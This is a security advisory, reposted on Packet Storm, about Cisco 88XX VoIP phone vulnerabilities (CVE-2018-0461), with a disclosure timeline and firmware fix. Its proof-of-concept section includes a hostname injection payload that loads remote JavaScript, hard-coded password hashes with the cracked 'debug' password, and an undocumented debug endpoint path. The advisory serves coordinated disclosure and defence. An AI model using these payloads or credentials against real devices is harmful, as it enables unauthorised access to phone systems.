what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Cisco VoIP Script Insertion / Weak Passwords / Undocumented Functionality

Cisco VoIP Script Insertion / Weak Passwords / Undocumented Functionality
Posted Jan 10, 2019
Authored by W. Schober | Site sec-consult.com

Cisco VoIP phone such as models 88XX suffer from script insertion, weak and hard-coded passwords, undocumented debug functionality, and various outdated components with known vulnerabilities.

tags | exploit, vulnerability
systems | cisco
advisories | CVE-2018-0461
SHA-256 | 41a1b9784b878fa08044f5ed9bf633aed22e9a1c597ac51d8518b8c652c3cb84

Cisco VoIP Script Insertion / Weak Passwords / Undocumented Functionality

Change Mirror Download
SEC Consult Vulnerability Lab Security Advisory < 20190109-0 >
=======================================================================
title: Multiple Vulnerabilities
product: Cisco VoIP Phones, e.g. models 88XX
vulnerable version: See list of vulnerable devices/firmwares below
fixed version: 12.5.1 MN
CVE number: CVE-2018-0461
impact: high
homepage: https://www.cisco.com
found: 10/2018
by: W. Schober, IoT Inspector (Office Vienna)
SEC Consult Vulnerability Lab

An integrated part of SEC Consult
Europe | Asia | North America

https://www.sec-consult.com

=======================================================================

Vendor description:
-------------------
"The Cisco IP Phone 8800 Series is a great fit for businesses of all sizes
seeking secure, high-quality, full-featured VoIP. Select models provide
affordable entry to HD video and support for highly-active, in-campus mobile
workers."

Source:
https://www.cisco.com/c/en/us/products/collaboration-endpoints/unified-ip-phone-8800-series/index.html


Business recommendation:
------------------------
SEC Consult recommends to update the devices to the newest firmware (12.5.1 MN),
where all the documented issues are fixed according to the vendor.

We want to thank Cisco for the very professional response and great coordination.


Vulnerability overview/description:
-----------------------------------
1) Arbitrary Script Injection
The VOIP phones can be managed directly via the integrated keyboard and the
built-in screen. In the configuration menu a few spots allow users to input
text via the integrated keyboard into text boxes (e.g. Hostname). Those text
input fields are prone to JavaScript-like code injection. An attacker is able
to inject arbitrary payloads via the T9 keyboard.


2) Hard coded and weak secrets
(Identified during an automated firmware analysis by IoT Inspector)
The firmware, which is directly served from Cisco, contains multiple hard coded
password hashes. They are stored in the /etc/passwd file and are hashed using
an outdated algorithm (UNIX MD5+salt). The users are not documented anywhere.
Access via SSH using those credentials is possible.

Due to the outdated algorithm in use (UNIX MD5+Salt) and the very weak password
it was easily possible to brute-force the password within seconds.


3) Undocumented debug functionality
During a manual firmware analysis a few undocumented endpoints in the
built-in web application, which is running on the VOIP phone,
were identified. Those routes lead to parts of the web application that are
neither documented nor officially mentioned anywhere by Cisco. Those parts of
the web application allow an attacker to debug the device and create memory
dumps.


4) Various outdated components with known vulnerabilities
During the check a lot of outdated components were identified by their version
numbers. It is not known which patches got backported by the vendor but Cisco
mentioned that they have implemented some. The potentially affected components
are:

-) wpa_supplicant
-) BusyBox
-) Dnsmasq
-) OpenSSL
-) OpenSSH
-) Linux Kernel Privilege Escalation app_keya
-) Linux Kernel Privilege Escalation aMempodippera
-) Multiple Linux Kernel CVE entries

Please take a look at the IoT Inspector report for details:
https://r.sec-consult.com/iotinspectorcisco


Proof of concept:
-----------------
1) Arbitrary Script Injection
A lot of settings can be changed directly on the VOIP phone via the built-in
screen. There are also multiple locations, where user-input is parsed and
displayed. It was possible to inject arbitrary (JavaScript) code directly into
the phone UI. As an example the hostname of the VOIP Phone can be changed to
the following value:

hostnamea><img src=http://$IP/sec.js onload=exec()>

The sec.js gets loaded from the remote host immediately and the exec function
is executed.

< A screenshot can be found online on our website >

Further analysis has not been performed, but depending on the underlying
libraries/system in use, it might be possible to get system level access via
this attack vector.


2) Hard coded and weak secrets
The file at the following path contains a hard coded password for the user debug:
/_rootfs288xx.12-0-1ES-15.sbn.extracted/squashfs-root/etc/passwd

$1$aoJQnypw$vHpN9WTJEQn1UnHzJdoz71 (Type: MD5 (Unix))

This hash corresponds to the following clear-text password: debug

The password for the user root and default is also stored in the /etc/passwd:
nCjlgBm7.lvX2 (Type: DES (Unix)) - Users: root, default


3) Undocumented debug functionality
The built-in VOIP phone web server offers multiple functionalities for the
end-user. During a manual analysis, undocumented endpoints with critical
functionality got identified. The functionality can be found by visiting
the following endpoint:

https://$VOIP-Phone-IP/CGI/Java/Monitor

Offered functionality includes:
-) Memory Info
-) Garbage Collection
-) Thread Info
-) Registration Info
-) Properties
-) Monitor Menu
-) Lock Menu

< A screenshot can be found online on our website >

4) Various outdated components with known vulnerabilities
No PoC available


Vulnerable / tested versions:
-----------------------------
The following firmware/device has been tested with IoT Inspector and manually:
* Cisco IP Phone 88xx: Firmware version 12-0-1 ES-15 (ID: f86aa7612d9311e6)

The following devices are also vulnerable according to the vendor:
* IP Conference Phone 8832
* IP Phone 8811
* IP Phone 8841
* IP Phone 8845
* IP Phone 8851
* IP Phone 8861
* IP Phone 8865
* Unified IP Conference Phone 8831
* Wireless IP Phone 8821
* Wireless IP Phone 8821-EX


Vendor contact timeline:
------------------------
2018-10-17: Contacting Cisco PSIRT through psirt@cisco.com
2018-10-17: Initial response from Cisco PSIRT. Assigned ID: PSIRT-0289060835
Cisco PSIRT requests that the public disclosure should be
shifted to January 2019 to avoid public christmas holidays.
2018-10-18: Contacting Cisco PSIRT and agreeing on public disclosure date
2019-01-09.
2018-10-24: Update from Cisco that a case owner got assigned.
2018-10-29: Update from Cisco that they are still reviewing the vulnerabilities
and that they have already requested CVEs.
2018-11-05: Update from Cisco with further details about the internal scheduling.
2018-11-12: Update from Cisco with further details about CVEs.
2018-11-12: Cisco assigned CVE-2018-0461 and informed us that the vulnerabilities
will be fixed in an upcoming release at the end of the year;
Requesting affected/fixed versions.
2018-11-30: Cisco responds with affected devices and firmwares. Requesting
updated firmware to do another IoT inspector scan, to verify the
fixes.
2019-01-09: Public release of security advisory


Solution:
---------
Update the firmware of the affected devices to at least 12.5.1 MN.

The vendor has published a security advisory as well:
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190109-phone-script-injection


Workaround:
-----------
Disable the built-in web server
Segment the VOIP network in a way, that access for devices other
than VoIP phones in any direction is not possible at all.
Remove the debug user


Advisory URL:
-------------
https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab

SEC Consult
Europe | Asia | North America

About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It
ensures the continued knowledge gain of SEC Consult in the field of network
and application security to stay ahead of the attacker. The SEC Consult
Vulnerability Lab supports high-quality penetration testing and the evaluation
of new offensive and defensive technologies for our customers. Hence our
customers obtain the most current information about vulnerabilities and valid
recommendation about the risk profile of new technologies.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Interested to work with the experts of SEC Consult?
Send us your application https://www.sec-consult.com/en/career/index.html

Interested in improving your cyber security with the experts of SEC Consult?
Contact our local offices https://www.sec-consult.com/en/contact/index.html
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult

EOF W. Schober / @2019

Login or Register to add favorites

File Archive:

October 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Oct 1st
    10 Files
  • 2
    Oct 2nd
    0 Files
  • 3
    Oct 3rd
    12 Files
  • 4
    Oct 4th
    15 Files
  • 5
    Oct 5th
    18 Files
  • 6
    Oct 6th
    16 Files
  • 7
    Oct 7th
    12 Files
  • 8
    Oct 8th
    0 Files
  • 9
    Oct 9th
    0 Files
  • 10
    Oct 10th
    0 Files
  • 11
    Oct 11th
    0 Files
  • 12
    Oct 12th
    0 Files
  • 13
    Oct 13th
    0 Files
  • 14
    Oct 14th
    0 Files
  • 15
    Oct 15th
    0 Files
  • 16
    Oct 16th
    0 Files
  • 17
    Oct 17th
    0 Files
  • 18
    Oct 18th
    0 Files
  • 19
    Oct 19th
    0 Files
  • 20
    Oct 20th
    0 Files
  • 21
    Oct 21st
    0 Files
  • 22
    Oct 22nd
    0 Files
  • 23
    Oct 23rd
    0 Files
  • 24
    Oct 24th
    0 Files
  • 25
    Oct 25th
    0 Files
  • 26
    Oct 26th
    0 Files
  • 27
    Oct 27th
    0 Files
  • 28
    Oct 28th
    0 Files
  • 29
    Oct 29th
    0 Files
  • 30
    Oct 30th
    0 Files
  • 31
    Oct 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close